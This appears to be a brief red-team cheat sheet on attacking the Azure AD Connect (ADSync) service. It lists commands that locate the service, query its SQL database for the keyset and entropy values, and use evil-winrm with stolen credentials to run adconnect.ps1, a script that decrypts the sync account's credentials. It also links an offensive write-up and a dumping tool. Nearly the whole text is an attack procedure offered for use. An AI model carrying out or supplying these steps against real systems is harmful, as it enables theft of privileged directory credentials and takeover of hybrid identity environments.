Azure AD Sync Service
Resource: https://blog.xpnsec.com/azuread-connect-for-redteam/
Service Name: ADSync
Tools: https://github.com/dirkjanm/adconnectdump
STEPS:
Get-Item -Path HKLM:\SYSTEM\CurrentControlSet\Services\ADSync Get-ItemProperty -Path "C:\Program Files\Microsoft Azure AD Sync\Bin\miiserver.exe" | Format-list -Property * -Force sqlcmd -S HOSTNAME -Q "use ADsync; select instance_id,keyset_id,entropy from mms_server_configuration" evil-winrm -i IP_ADDRESS -u USERNAME -p "PASSWORD" -s . adconnect.ps1 Last updated